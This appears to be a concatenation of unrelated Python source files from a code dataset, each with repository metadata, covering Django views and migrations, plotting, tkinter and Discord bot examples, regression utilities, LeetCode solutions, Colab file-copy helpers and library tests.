pHArray[pHrange] =lowpH+(pHrange); muH[pHrange]=-0.059*pHArray[pHrange]; muH2O[pHrange]=1.23-0.059*pHArray[pHrange]; ############################################################## ax.plot(pHArray[:], muH[:],'c--',label='$H_2$',linewidth=1) ax.plot(pHArray[:], muH2O[:],'b--',label='$H_2O$', linewidth=1) ax.legend(loc='upper center', bbox_to_anchor=(1.3, 0.9), ncol=1) plt.ylabel('Electric Potential, E(V)') plt.xlabel('pH') plt.title('Bi-Cu-S Pourbaix Diagram, $\eta_{Bi,Cu,S}=10^{-'+str(eta)+'}$, '+str(composition[0])+'Cu:' +str(composition[1])+'Bi:'+str(composition[2])+'S') ############################################################################### ############## Plot with Lines ############################################ ############################################################################### flag = np.zeros((50,6)) # The first three indexes are the materials stored, the next three are the colors index=0; fig =plt.figure() ax=plt.subplot(111) ax = plt.gca() ax.set_xlim([lowpH,highpH]) ax.set_ylim([Ulow,Uhigh]) #If drawing lines for metastable phases for i in range(1, n): #calculate the energies for each species number pH=lowpH+(i*pHcount); for j in range(1,n): U=Ulow+(j*Ucount); #If drawing lines for metastable phases if((muValues[i,j,0]!=muValues[i-1,j,0])): ax.plot(pH,U,'.', color = [0.0,0.0,0.0],markersize=2) elif(muValues[i,j,1]!=muValues[i-1,j,1]): ax.plot(pH,U,'.', color = [0.0,0.0,0.0],markersize=2) elif((muValues[i,j,0]!=muValues[i,j-1,0]) or (muValues[i,j,1]!=muValues[i,j-1,1])): ax.plot(pH,U,'.', color = [0.0,0.0,0.0],markersize=2) elif((muValues[i,j,2]!=muValues[i,j-1,2]) or (muValues[i,j,2]!=muValues[i-1,j,2])): ax.plot(pH,U,'.', color = [0.0,0.0,0.0],markersize=2) ax.plot(pHArray[:], muH[:],'c--',label='$H_2$',linewidth=1) ax.plot(pHArray[:], muH2O[:],'b--',label='$H_2O$', linewidth=1) plt.ylabel('Electric Potential, E(V)') plt.xlabel('pH') plt.title('Bi-Cu-S Pourbaix Diagram, $\eta_{Bi,Cu,S}=10^{-'+str(eta)+'}$, '+str(composition[0])+'Cu:' +str(composition[1])+'Bi:'+str(composition[2])+'S') chartBox=ax.get_position() ax.set_position([chartBox.x0, chartBox.y0, chartBox.width*1.5, chartBox.height*1.5]) ax.legend(loc='upper center', bbox_to_anchor=(1.3, 0.9), ncol=1) plt.show() print('End of Script')
2.78125
3
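A quick way to sanity-check the linear-combination test used in the record above: rather than comparing floating-point ratios with ==, one can solve for the mixing coefficients and verify the reconstruction numerically. A minimal sketch; the 3x3 stoichiometry matrix and target composition here are made up for illustration, not taken from the script:

import numpy as np

# Hypothetical stoichiometry: rows are elements (Cu, Bi, S), columns are species.
a = np.array([[1.0, 0.0, 1.0],
              [0.0, 1.0, 1.0],
              [0.0, 0.0, 1.0]])
composition = np.array([1.0, 1.0, 1.0])

f = np.linalg.solve(a, composition)     # mixing coefficients
assert np.allclose(a @ f, composition)  # verify instead of comparing ratios with ==
print(f / f.sum())                      # fractions, as stored in combos[:, 8, :]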
masjid/views.py
1935090/donation
0
12789913
from django.shortcuts import render
from .models import Masjid, SalahTime
from .serializers import MasjidSerializer, SalahTimeSerializer
from rest_framework import viewsets
from rest_framework.decorators import api_view
from masjid.models import Masjid
from rest_framework.response import Response
from rest_framework import status
from rest_framework_extensions.mixins import NestedViewSetMixin
from users.models import CustomUser


class MasjidViewSet(viewsets.ModelViewSet):
    queryset = Masjid.objects.all()
    serializer_class = MasjidSerializer


class SalahTimeViewSet(viewsets.ModelViewSet):
    queryset = SalahTime.objects.all()
    serializer_class = SalahTimeSerializer


@api_view(['GET'])
def getAllMasjid(request):
    if request.method == 'GET':
        masjids = Masjid.objects.all()
        masjid_dict = {}
        masjid_list = []
        if masjids:
            for obj in masjids:
                masjid_id = obj.id
                try:
                    salatime_obj = SalahTime.objects.get(masjid_id=masjid_id)
                except SalahTime.DoesNotExist:
                    salatime_obj = None
                try:
                    masjid_user = CustomUser.objects.get(id=obj.masjid_user)
                except CustomUser.DoesNotExist:
                    masjid_user = None
                salatime_obj_dict = {}
                if salatime_obj:
                    salatime_obj_dict = {
                        "id": salatime_obj.id,
                        "fajar_azan": salatime_obj.fajar_azan,
                        "fajar_prayer": salatime_obj.fajar_prayer,
                        "dhuhr_azan": salatime_obj.Dhuhr_azan,
                        "dhuhr_prayer": salatime_obj.Dhuhr_prayer,
                        "asr_azan": salatime_obj.Asr_azan,
                        "asr_prayer": salatime_obj.Asr_prayer,
                        "maghrib_azan": salatime_obj.Maghrib_azan,
                        "maghrib_prayer": salatime_obj.Maghrib_prayer,
                        "isha_azan": salatime_obj.Isha_azan,
                        "isha_prayer": salatime_obj.Isha_prayer,
                        "jummah_azan": salatime_obj.jummah_azan,
                        "jummah_prayer": salatime_obj.jummah_prayer,
                    }
                # Guard against masjid_user being None (the original dereferenced
                # profile_pic without checking and could raise AttributeError).
                if masjid_user and masjid_user.profile_pic:
                    masjid_dict = {
                        "id": obj.id,
                        "name": obj.name,
                        "address": obj.address,
                        "profile_pic": masjid_user.profile_pic.url,
                        "salatime": salatime_obj_dict,
                    }
                else:
                    masjid_dict = {
                        "id": obj.id,
                        "name": obj.name,
                        "address": obj.address,
                        "profile_pic": None,
                        "salatime": salatime_obj_dict,
                    }
                masjid_list.append(masjid_dict)
            return Response({
                "status": status.HTTP_200_OK,
                "masjid_list": masjid_list,
            })
        else:
            return Response({
                "status": status.HTTP_204_NO_CONTENT,
                "message": "No masjid found",
            })
    return Response({"message": "Method not allowed"})
# (a short usage sketch follows this record)
2
2
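A hedged sketch of how the endpoint above might be exercised from the project's own test suite. The URL path is an assumption, since the project's urls.py is not shown in this record:

from rest_framework.test import APIClient

client = APIClient()
response = client.get('/masjid/all/')  # hypothetical route for getAllMasjid
data = response.json()
print(data.get('status'), len(data.get('masjid_list', [])))  # each entry nests a 'salatime' dict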
db-server/dbcon/migrations/0003_auto_20210528_1824.py
JannisBush/xs-leaks-browser-web
0
12789914
<gh_stars>0
# Generated by Django 3.2.3 on 2021-05-28 18:24

from django.db import migrations, models
import django.db.models.deletion


class Migration(migrations.Migration):

    dependencies = [
        ('dbcon', '0002_auto_20210528_1657'),
    ]

    operations = [
        migrations.CreateModel(
            name='WindowProperties',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('op_frame_count', models.TextField()),
                ('op_win_window', models.TextField()),
                ('op_win_CSS2Properties', models.TextField()),
                ('op_win_origin', models.TextField()),
                ('op_win_opener', models.TextField()),
            ],
        ),
        migrations.RemoveConstraint(
            model_name='objectproperties',
            name='op',
        ),
        migrations.RemoveField(
            model_name='objectproperties',
            name='op_frame_count',
        ),
        migrations.RemoveField(
            model_name='objectproperties',
            name='op_win_CSS2Properties',
        ),
        migrations.RemoveField(
            model_name='objectproperties',
            name='op_win_opener',
        ),
        migrations.RemoveField(
            model_name='objectproperties',
            name='op_win_origin',
        ),
        migrations.RemoveField(
            model_name='objectproperties',
            name='op_win_window',
        ),
        migrations.AlterField(
            model_name='events',
            name='event_list',
            field=models.TextField(),
        ),
        migrations.AlterField(
            model_name='events',
            name='event_set',
            field=models.TextField(),
        ),
        migrations.AlterField(
            model_name='globalproperties',
            name='gp_download_bar_height',
            field=models.TextField(),
        ),
        migrations.AlterField(
            model_name='globalproperties',
            name='gp_securitypolicyviolation',
            field=models.TextField(),
        ),
        migrations.AlterField(
            model_name='globalproperties',
            name='gp_window_getComputedStyle',
            field=models.TextField(),
        ),
        migrations.AlterField(
            model_name='globalproperties',
            name='gp_window_hasOwnProperty',
            field=models.TextField(),
        ),
        migrations.AlterField(
            model_name='globalproperties',
            name='gp_window_onblur',
            field=models.TextField(),
        ),
        migrations.AlterField(
            model_name='globalproperties',
            name='gp_window_onerror',
            field=models.TextField(),
        ),
        migrations.AlterField(
            model_name='globalproperties',
            name='gp_window_postMessage',
            field=models.TextField(),
        ),
        migrations.AlterField(
            model_name='objectproperties',
            name='op_el_buffered',
            field=models.TextField(),
        ),
        migrations.AlterField(
            model_name='objectproperties',
            name='op_el_duration',
            field=models.TextField(),
        ),
        migrations.AlterField(
            model_name='objectproperties',
            name='op_el_height',
            field=models.TextField(),
        ),
        migrations.AlterField(
            model_name='objectproperties',
            name='op_el_media_error',
            field=models.TextField(),
        ),
        migrations.AlterField(
            model_name='objectproperties',
            name='op_el_naturalHeight',
            field=models.TextField(),
        ),
        migrations.AlterField(
            model_name='objectproperties',
            name='op_el_naturalWidth',
            field=models.TextField(),
        ),
        migrations.AlterField(
            model_name='objectproperties',
            name='op_el_networkState',
            field=models.TextField(),
        ),
        migrations.AlterField(
            model_name='objectproperties',
            name='op_el_paused',
            field=models.TextField(),
        ),
        migrations.AlterField(
            model_name='objectproperties',
            name='op_el_readyState',
            field=models.TextField(),
        ),
        migrations.AlterField(
            model_name='objectproperties',
            name='op_el_seekable',
            field=models.TextField(),
        ),
        migrations.AlterField(
            model_name='objectproperties',
            name='op_el_sheet',
            field=models.TextField(),
        ),
        migrations.AlterField(
            model_name='objectproperties',
            name='op_el_videoHeight',
            field=models.TextField(),
        ),
        migrations.AlterField(
            model_name='objectproperties',
            name='op_el_videoWidth',
            field=models.TextField(),
        ),
        migrations.AlterField(
            model_name='objectproperties',
            name='op_el_width',
            field=models.TextField(),
        ),
        migrations.AddConstraint(
            model_name='objectproperties',
            constraint=models.UniqueConstraint(fields=('op_el_height', 'op_el_width', 'op_el_naturalHeight', 'op_el_naturalWidth', 'op_el_videoHeight', 'op_el_videoWidth', 'op_el_duration', 'op_el_networkState', 'op_el_readyState', 'op_el_buffered', 'op_el_paused', 'op_el_seekable', 'op_el_sheet', 'op_el_media_error'), name='op'),
        ),
        migrations.AddConstraint(
            model_name='windowproperties',
            constraint=models.UniqueConstraint(fields=('op_frame_count', 'op_win_window', 'op_win_CSS2Properties', 'op_win_origin', 'op_win_opener'), name='win'),
        ),
        migrations.AddField(
            model_name='observation',
            name='window_properties',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='dbcon.windowproperties'),
        ),
    ]
1.546875
2
ooppython3/modalidade.py
mpeschke/PARADIG-PROG-N1-OOP-PYTHON3
0
12789915
# coding=UTF-8
"""
Module: provides the superclass with all the methods needed to implement
an event (modality) of an Olympic competition.
"""
from ooppython3.adversario import Adversario


class Modalidade:
    """
    Superclass representing an event of an Olympic competition.
    """
    _adversarios = []
    _input = None
    _numtentativas = None
    _numadversarios = None
    _mensagem = None
    _vencedor = "Empate"

    def __init__(self, inp, numtentativas, numadversarios, mensagem):
        """
        Constructor.
        @param inp: instance of the class responsible for data input.
        @param numtentativas: number of attempts (scores, throws) used for ranking in the competition.
        @param numadversarios: number of competitors in the competition.
        @param mensagem: message shown to guide data input.
        """
        self._input = inp
        self._numtentativas = numtentativas
        self._numadversarios = numadversarios
        self._mensagem = mensagem
        # Per-instance list; relying on the shared class-level list would leak
        # competitors between instances.
        self._adversarios = []

    def validarentrada(self, entrada):
        """
        Validates a competitor's input data (scores, throws).
        @param entrada: the competitor's (scores, throws).
        @return: True (valid) or False (invalid).
        """
        # Note: the original compared integers with 'is'; '==' is the correct test.
        if len(self._adversarios) == self._numadversarios:
            return False
        _strtentativas = entrada.split(',')
        if len(_strtentativas) < self._numtentativas:
            return False
        try:
            _floattentativas = [float(x) for x in _strtentativas]
        except ValueError:
            return False
        if len(_floattentativas) == self._numtentativas:
            self._adversarios.append(
                Adversario(
                    nome="Adversario {}".format(len(self._adversarios) + 1),
                    resultado=_floattentativas
                )
            )
            return True
        return False

    def lerentrada(self, numadversario):
        """
        Captures the user's input.
        @param numadversario: competitor identifier.
        @return: the user's input.
        """
        return self._input.input(
            self._mensagem.format(
                self._numtentativas,
                numadversario
            )
        )

    def iniciar(self):
        """
        Runs the competition (processes the results).
        Note that the superclass only handles the part common to all
        competitions, which is sorting the results.
        @return: None
        """
        for adversario in self.adversarios():
            adversario.resultado().sort(reverse=True)

    def numeroadversarios(self):
        """
        Number of competitors.
        @return: number of competitors.
        """
        return self._numadversarios

    def numerotentativas(self):
        """
        Number of attempts (scores, throws).
        @return: number of attempts (scores, throws).
        """
        return self._numtentativas

    def adversarios(self):
        """
        List of competitors in the competition.
        @return: list of competitors ('Adversario' instances).
        """
        return self._adversarios

    def vencedor(self):
        """
        Winner of the competition.
        @return: name of the winning competitor, or 'Empate' in case of a tie.
        """
        return self._vencedor
# (a short usage sketch follows this record)
3.5
4
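A minimal sketch of how the superclass above could be exercised. The input stub and the message text are illustrative and not from the repo; the real project supplies its own input class and Adversario:

class FakeInput:
    """Input stub standing in for the repo's real input class (assumption)."""
    def __init__(self, answers):
        self._answers = list(answers)

    def input(self, prompt):
        return self._answers.pop(0)

inp = FakeInput(["9.5,9.0,8.5"])
m = Modalidade(inp, numtentativas=3, numadversarios=1,
               mensagem="Enter {} scores for competitor {}: ")
entrada = m.lerentrada(1)
print(m.validarentrada(entrada))  # True: three comma-separated floats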
advancedapplication/test.py
wDove1/motorisedcameratracking
0
12789916
# import tkinter module
from tkinter import *
from tkinter.ttk import *

# creating main tkinter window/toplevel
master = Tk()

# this will create a label widget
l1 = Label(master, text="Height")
l2 = Label(master, text="Width")

# grid method to arrange labels in respective
# rows and columns as specified
l1.grid(row=0, column=0, sticky=W, pady=2)
l2.grid(row=1, column=20, sticky=W, pady=2)

# entry widgets, used to take entry from user
e1 = Entry(master)
e2 = Entry(master)

# this will arrange entry widgets
e1.grid(row=0, column=1, pady=2)
e2.grid(row=1, column=1, pady=2)

# checkbutton widget
c1 = Checkbutton(master, text="Preserve")
c1.grid(row=2, column=0, sticky=W, columnspan=2)

# adding image (remember image should be PNG and not JPG)
# img = PhotoImage(file=r"C:\Users\Admin\Pictures\capture1.png")
# img1 = img.subsample(2, 2)

# setting image with the help of label
# Label(master, image=img1).grid(row=0, column=2,
#                                columnspan=2, rowspan=2, padx=5, pady=5)

# button widget
b1 = Button(master, text="Zoom in")
b2 = Button(master, text="Zoom out")

# arranging button widgets
b1.grid(row=2, column=2, sticky=E)
b2.grid(row=2, column=3, sticky=E)

# infinite loop which can be terminated
# by keyboard or mouse interrupt
mainloop()
3.96875
4
third_party/longstaff_schwartz/regression_basis.py
christiandorion/hecmtl
17
12789917
<reponame>christiandorion/hecmtl<filename>third_party/longstaff_schwartz/regression_basis.py
# -*- coding: utf-8 -*-

import numpy as np
from numpy.linalg import lstsq


class RegressionBasis:
    def __init__(self, basis_functions):
        self.basis_functions = basis_functions

    def __str__(self):
        return ' + '.join(str(f) for f in self.basis_functions)

    def apply(self, x):
        for f in self.basis_functions:
            yield f(x)

    def __call__(self, x):
        assert x.ndim == 1
        x = x.reshape((x.shape[0], 1))
        return np.concatenate(tuple(self.apply(x)), axis=1)

    def fit(self, x, y):
        beta, *_ = lstsq(self(x), y, rcond=None)
        return FittedFunction(self, beta, (x.min(), x.max()))


class FittedFunction:
    def __init__(self, basis, beta, domain):
        self.basis = basis
        self.beta = beta
        self.domain = domain

    def __call__(self, x):
        return self.basis(x) @ self.beta

    def linspace(self, n=100, domain=None):
        domain = domain or self.domain
        x = np.linspace(domain[0], domain[1], n)
        return x, self(x)


class PolynomialRegressionFunction:
    def __init__(self, exponent):
        self.exponent = exponent

    def __str__(self):
        return f'x**{self.exponent}'

    def __call__(self, x):
        return x ** self.exponent


class PolynomialRegressionBasis(RegressionBasis):
    def __init__(self, degree):
        super().__init__([PolynomialRegressionFunction(i) for i in range(degree + 1)])
        self.degree = degree
# (a short usage sketch follows this record)
2.375
2
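A small usage sketch for the basis classes above: fit a quadratic to noisy data and evaluate the fitted function. The data here is made up for illustration:

import numpy as np

basis = PolynomialRegressionBasis(degree=2)
x = np.linspace(-1.0, 1.0, 50)
y = 2.0 + 3.0 * x - 1.5 * x ** 2 + 0.01 * np.random.randn(50)

fitted = basis.fit(x, y)       # least-squares fit via numpy.linalg.lstsq
xs, ys = fitted.linspace(n=5)  # evaluate on the fitted domain
print(fitted.beta)             # approximately [2.0, 3.0, -1.5]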
examples/views/dropdown.py
Mihitoko/pycord
0
12789918
<gh_stars>0
import discord


# Defines a custom Select containing colour options
# that the user can choose. The callback function
# of this class is called when the user changes their choice.
class Dropdown(discord.ui.Select):
    def __init__(self, bot_: discord.Bot):
        # For example, you can use self.bot to retrieve a user or perform other functions in the callback.
        # Alternatively you can use Interaction.client, so you don't need to pass the bot instance.
        self.bot = bot_

        # Set the options that will be presented inside the dropdown:
        options = [
            discord.SelectOption(label="Red", description="Your favourite colour is red", emoji="🟥"),
            discord.SelectOption(label="Green", description="Your favourite colour is green", emoji="🟩"),
            discord.SelectOption(label="Blue", description="Your favourite colour is blue", emoji="🟦"),
        ]

        # The placeholder is what will be shown when no option is selected.
        # The min and max values indicate we can only pick one of the three options.
        # The options parameter, contents shown above, define the dropdown options.
        super().__init__(
            placeholder="Choose your favourite colour...",
            min_values=1,
            max_values=1,
            options=options,
        )

    async def callback(self, interaction: discord.Interaction):
        # Use the interaction object to send a response message containing
        # the user's favourite colour or choice. The self object refers to the
        # Select object, and the values attribute gets a list of the user's
        # selected options. We only want the first one.
        await interaction.response.send_message(f"Your favourite colour is {self.values[0]}")


# Defines a simple View that allows the user to use the Select menu.
class DropdownView(discord.ui.View):
    def __init__(self, bot_: discord.Bot):
        self.bot = bot_
        super().__init__()

        # Adds the dropdown to our View object
        self.add_item(Dropdown(self.bot))

        # Initializing the view and adding the dropdown can actually be done in a one-liner if preferred:
        # super().__init__(Dropdown(self.bot))


bot = discord.Bot(debug_guilds=[...])


@bot.slash_command()
async def colour(ctx: discord.ApplicationContext):
    """Sends a message with our dropdown that contains colour options."""
    # Create the view containing our dropdown
    view = DropdownView(bot)
    # Sending a message containing our View
    await ctx.respond("Pick your favourite colour:", view=view)


@bot.event
async def on_ready():
    print(f"Logged in as {bot.user} (ID: {bot.user.id})")
    print("------")


bot.run("TOKEN")
3.640625
4
ratings/urls.py
daltonamitchell/rating-dashboard
1
12789919
<gh_stars>1-10
from django.conf.urls import url

from . import views

urlpatterns = [
    url(r'^new/$', views.create, name='new'),
    url(r'^store/', views.store, name='store'),
    url(r'^$', views.index, name='index'),
]
1.53125
2
app/resources/SearchEndpoint.py
ajlouie/ithriv_service-1
0
12789920
<filename>app/resources/SearchEndpoint.py
import elasticsearch
import flask_restful
from flask import request, g

from app import elastic_index, RestException
from app.models import ThrivResource, Availability, ThrivInstitution
from app.models import Facet, FacetCount, Filter, Search
from app.resources.schema import SearchSchema, ThrivResourceSchema
from app.resources.Auth import login_optional


class SearchEndpoint(flask_restful.Resource):
    @login_optional
    def post(self):
        request_data = request.get_json()
        search, errors = SearchSchema().load(request_data)
        if errors:
            raise RestException(RestException.INVALID_OBJECT, details=errors)
        try:
            results = elastic_index.search_resources(search)
        except elasticsearch.ElasticsearchException as e:
            print(e)
            raise RestException(RestException.ELASTIC_ERROR)

        resources = []
        filterredResults = []
        for hit in results:
            resource = ThrivResource.query.filter_by(id=hit.id).first()
            if resource is not None and resource.user_may_view():
                resources.append(resource)
                filterredResults.append(hit)

        search.total = results.hits.total
        search.resources = ThrivResourceSchema().dump(resources, many=True).data
        results.hits = filterredResults

        search.facets = []
        for facet_name in results.facets:
            if facet_name == "Approved":
                # Only expose the approval facet to administrators.
                if 'user' in g and g.user and g.user.role == "Admin":
                    facet = Facet(facet_name)
                    facet.facetCounts = []
                    for category, hit_count, is_selected in results.facets[facet_name]:
                        facet.facetCounts.append(FacetCount(category, hit_count, is_selected))
                    search.facets.append(facet)
            else:
                facet = Facet(facet_name)
                facet.facetCounts = []
                for category, hit_count, is_selected in results.facets[facet_name]:
                    facet.facetCounts.append(FacetCount(category, hit_count, is_selected))
                search.facets.append(facet)

        return SearchSchema().jsonify(search)
# (a short usage sketch follows this record)
2.125
2
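A hedged sketch of the request shape the endpoint above appears to expect: a JSON body that SearchSchema can load, posted to wherever the resource is registered. The host, path, and payload fields below are assumptions, since neither the routing nor the schema definition is shown in this record:

import requests  # sketch only; real host/path/fields are assumptions

payload = {"query": "data science", "filters": []}  # fields assumed from SearchSchema
r = requests.post("http://localhost:5000/api/search", json=payload)
print(r.status_code, r.json())  # response includes total, resources and facets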
Python/lc_253_meeting_rooms_ii.py
cmattey/leetcode_problems
6
12789921
<gh_stars>1-10
# Time: O(nlogn)
# Space: O(n)
from typing import List  # needed for the List[List[int]] annotations below


class Solution:
    def minMeetingRooms(self, intervals: List[List[int]]) -> int:
        import heapq
        if not intervals:
            return 0

        intervals.sort(key=lambda interval: interval[0])

        # Min-heap of end times: one entry per room currently in use.
        heap = []
        heapq.heappush(heap, intervals[0][1])

        for interval in intervals[1:]:
            if heap[0] <= interval[0]:
                # The earliest-ending room is free again; reuse it.
                heapq.heappop(heap)
            heapq.heappush(heap, interval[1])

        return len(heap)


# Oct 28th '19
# Time: O(nlogn)
# Space: O(n)
class Solution:
    def minMeetingRooms(self, intervals: List[List[int]]) -> int:
        import heapq
        if not intervals:
            return 0

        intervals.sort(key=lambda kv: kv[0])
        heap = [intervals[0][1]]

        for start, end in intervals[1:]:
            prev_end = heapq.heappop(heap)
            if start < prev_end:
                # Overlap: the previous room stays busy and a new one is needed.
                heapq.heappush(heap, prev_end)
                heapq.heappush(heap, end)
            else:
                heapq.heappush(heap, max(prev_end, end))

        return len(heap)
# (a short usage sketch follows this record)
2.921875
3
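A quick check of the heap-based solution above, assuming the Solution class from the record is in scope. The heap stores end times of rooms in use, so overlapping meetings grow it while back-to-back meetings reuse a room:

s = Solution()
print(s.minMeetingRooms([[0, 30], [5, 10], [15, 20]]))  # 2: [0,30] overlaps both others
print(s.minMeetingRooms([[7, 10], [2, 4]]))             # 1: no overlap, one room suffices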
colab_transfer/transfer.py
woctezuma/google-colab-transfer
11
12789922
<reponame>woctezuma/google-colab-transfer<gh_stars>10-100
import glob
import os
import shutil
from pathlib import Path

from colab_transfer.google_drive import mount_google_drive, is_google_drive_mounted
from colab_transfer.utils import get_path_to_home_of_google_drive, get_path_to_home_of_local_machine


def copy_file(file_name, source=None, destination=None, verbose=True):
    if not is_google_drive_mounted():
        mount_google_drive()

    if source is None:
        source = get_path_to_home_of_google_drive()

    if destination is None:
        destination = get_path_to_home_of_local_machine()
    else:
        Path(destination).mkdir(parents=True, exist_ok=True)

    input_file_name = source + file_name
    output_file_name = destination + file_name

    if Path(output_file_name).exists():
        if verbose:
            print('File {} already exists. Copy skipped.'.format(output_file_name))
    else:
        if verbose:
            print('Copying {} to {}'.format(input_file_name, output_file_name))
        try:
            shutil.copyfile(input_file_name, output_file_name)
        except FileNotFoundError:
            print('File {} could not be found. Copy aborted.'.format(input_file_name))

    return


def copy_folder(folder_name, source=None, destination=None, verbose=True):
    if not is_google_drive_mounted():
        mount_google_drive()

    if source is None:
        source = get_path_to_home_of_google_drive()

    if destination is None:
        destination = get_path_to_home_of_local_machine()
    else:
        Path(destination).mkdir(parents=True, exist_ok=True)

    input_folder_name = source + folder_name
    output_folder_name = destination + folder_name

    if Path(output_folder_name).exists():
        if verbose:
            print('Folder {} already exists. Copy skipped.'.format(output_folder_name))
    else:
        if verbose:
            print('Copying {} to {}'.format(input_folder_name, output_folder_name))
        try:
            shutil.copytree(src=input_folder_name, dst=output_folder_name)
        except FileNotFoundError:
            print('Folder {} could not be found. Copy aborted.'.format(input_folder_name))

    return


def copy_folder_structure(source=None, destination=None, verbose=True):
    if not is_google_drive_mounted():
        mount_google_drive()

    if source is None:
        source = get_path_to_home_of_google_drive()

    if destination is None:
        destination = get_path_to_home_of_local_machine()
    else:
        Path(destination).mkdir(parents=True, exist_ok=True)

    files_and_folders = glob.glob(source + '*')
    root_files = glob.glob(source + '*.*')
    root_folders = set(files_and_folders).difference(root_files)

    if verbose:
        print('Files: {}'.format(root_files))
        print('Folders: {}'.format(root_folders))

    for f_name in root_files:
        file_name = os.path.basename(f_name)
        copy_file(file_name, source=source, destination=destination, verbose=verbose)

    for f_name in root_folders:
        folder_name = os.path.basename(f_name) + '/'
        copy_folder(folder_name, source=source, destination=destination, verbose=verbose)

    return


def main():
    return True


if __name__ == '__main__':
    main()
# (a short usage sketch follows this record)
3.078125
3
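Typical use of the helpers above inside a Colab notebook, assuming Google Drive can be mounted. The paths fall back to the library's defaults; the file name is illustrative:

from colab_transfer.transfer import copy_file, copy_folder_structure

# Copy a single file from the Drive home folder to the Colab VM home folder.
copy_file('model_weights.h5')  # hypothetical file name

# Mirror the top level of the Drive home folder onto the VM.
copy_folder_structure(verbose=True)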
lib/meshrenderer/gl_utils/__init__.py
THU-DA-6D-Pose-Group/self6dpp
33
12789923
# from .offscreen_context import OffscreenContext
import os

if os.environ.get("PYOPENGL_PLATFORM", None) == "egl":
    from .egl_offscreen_context import OffscreenContext
else:
    from .glfw_offscreen_context import OffscreenContext
from .fbo import Framebuffer
from .renderbuffer import Renderbuffer, RenderbufferMultisample
from .texture import (
    Texture,
    TextureMultisample,
    Texture1D,
    Texture3D,
    loadTexture,
)
from .shader import Shader
from .shader_storage_buffer import ShaderStorage
from .vertexbuffer import Vertexbuffer
from .vao import VAO
from .ibo import IBO
from .ebo import EBO
from .camera import Camera

# from .window import Window
from .material import Material
from . import geometry as geo
from .tiles import tiles, tiles4
from . import meshutil
from . import utils
from . import glcontext
from . import glrenderer
1.429688
1
Dictionary.py
FatalWhite/Python3Lab
0
12789924
<reponame>FatalWhite/Python3Lab<filename>Dictionary.py
# Dictionary: a mapping data structure
# Handles data by linking a value to a key
# A key is a number or name that identifies the stored data
# A value is the data stored under each key
# So knowing the key is enough to find the data directly
# A dictionary is written as {} with key:value pairs
# Multiple key:value pairs are separated by commas
menu = {
    '1': 'newSungJuk',
    '2': 'showSungJuk',
    '3': 'modifySungJuk'
}

# Keys can have various data types
book = {
    'bookid': '1',
    'bookname': '축구의역사',
    'publisher': '굿스포츠',
    'price': '7000'
}

order = {
    'orderid': '1',
    'custid': '1',
    'bookid': '1',
    'saleprice': 6000,
    'orderdate': '2014-07-01'
}

custromer = {
    'custid': '1',
    'name': '박지성',
    'address': '영국 멘체스타',
    'phone': '000-5000-0001'
}

print(book)

books_list = []
books_list.append(book)  # store the created dictionary in a list
books_list.append(book)
books_list.append(book)
print(books_list)

# dictionary methods
print('1' in book)       # the in operator searches dictionary keys
print('bookid' in book)

print(book['bookid'])    # look up a value by key
print(book['bookname'])
print(book['price'])
# print(book['orderid'])  # looking up a missing key raises an error!

print(book.get('bookname'))
print(book.get('orderid'))  # get() returns None for a missing key

bkname = book['bookname']   # look up by key, then print the value
print(bkname)

print(book.get('bookid'))
book['bookid'] = 99         # modify a value by key
print(book.get('bookid'))
print(book)

book.update({'판형': '3 x 4'})   # add a new key:value pair
print(book)

print(book)
book.update({'판형': '6 x 10'})  # update an existing key:value pair
print(book)

del book['판형']  # delete an existing key
print(book)

# book.clear()  # delete all keys

print(book.keys())    # print all keys
print(book.values())  # print all values
print(book.items())   # print all key:value pairs as tuples

items = book.items()  # all key:value pairs as a list of tuples
print(list(items))
2.25
2
tests/tests_bazaar.py
vitorruiz/tibia.py
22
12789925
<reponame>vitorruiz/tibia.py
import datetime
import unittest

from tests.tests_tibiapy import TestCommons
from tibiapy import (Auction, AuctionOrder, AuctionOrderBy, AuctionSearchType, AuctionStatus, BattlEyeTypeFilter,
                     BidType, CharacterBazaar, InvalidContent, PvpTypeFilter, Sex, SkillFilter,
                     Vocation, VocationAuctionFilter)

FILE_BAZAAR_CURRENT_EMPTY = "bazaar/tibiacom_history_empty.txt"
FILE_BAZAAR_CURRENT = "bazaar/tibiacom_current.txt"
FILE_BAZAAR_CURRENT_ALL_FILTERS = "bazaar/tibiacom_current_all_filters.txt"
FILE_BAZAAR_HISTORY = "bazaar/tibiacom_history.txt"
FILE_AUCTION_FINISHED = "bazaar/tibiacom_auction_finished.txt"
FILE_AUCTION_NOT_FOUND = "bazaar/tibiacom_auction_not_found.txt"


class TestBazaar(TestCommons, unittest.TestCase):
    def test_character_bazaar_from_content_current_no_filters_selected(self):
        bazaar = CharacterBazaar.from_content(self.load_resource(FILE_BAZAAR_CURRENT))

        self.assertIsNotNone(bazaar)
        self.assertEqual(300, bazaar.page)
        self.assertEqual(482, bazaar.total_pages)
        self.assertEqual(12031, bazaar.results_count)
        self.assertEqual(25, len(bazaar.entries))
        self.assertIsNotNone(bazaar.url)

        auction = bazaar.entries[0]
        self.assertEqual(30237, auction.auction_id)
        self.assertEqual(800, auction.bid)
        self.assertEqual(BidType.MINIMUM, auction.bid_type)
        self.assertIsNotNone(auction.character_url)
        self.assertEqual(0, len(auction.displayed_items))

        self.assertIsNotNone(bazaar.filters)
        self.assertIsNone(bazaar.filters.world)
        self.assertIsNone(bazaar.filters.pvp_type)
        self.assertIsNone(bazaar.filters.battleye)
        self.assertIsNone(bazaar.filters.vocation)
        self.assertIsNone(bazaar.filters.min_level)
        self.assertIsNone(bazaar.filters.max_level)
        self.assertIsNone(bazaar.filters.skill)
        self.assertIsNone(bazaar.filters.min_skill_level)
        self.assertIsNone(bazaar.filters.max_skill_level)
        self.assertEqual(AuctionOrder.LOWEST_EARLIEST, bazaar.filters.order)

    def test_character_bazaar_from_content_current_all_filters_selected(self):
        bazaar = CharacterBazaar.from_content(self.load_resource(FILE_BAZAAR_CURRENT_ALL_FILTERS))

        self.assertIsNotNone(bazaar)
        self.assertEqual(1, bazaar.page)
        self.assertEqual(4, bazaar.total_pages)
        self.assertEqual(92, bazaar.results_count)
        self.assertEqual(25, len(bazaar.entries))
        self.assertIsNotNone(bazaar.url)

        auction = bazaar.entries[0]
        self.assertEqual(82526, auction.auction_id)
        self.assertEqual(57000, auction.bid)
        self.assertEqual(BidType.MINIMUM, auction.bid_type)
        self.assertIsNotNone(auction.character_url)

        self.assertIsNotNone(bazaar.filters)
        self.assertEqual('Antica', bazaar.filters.world)
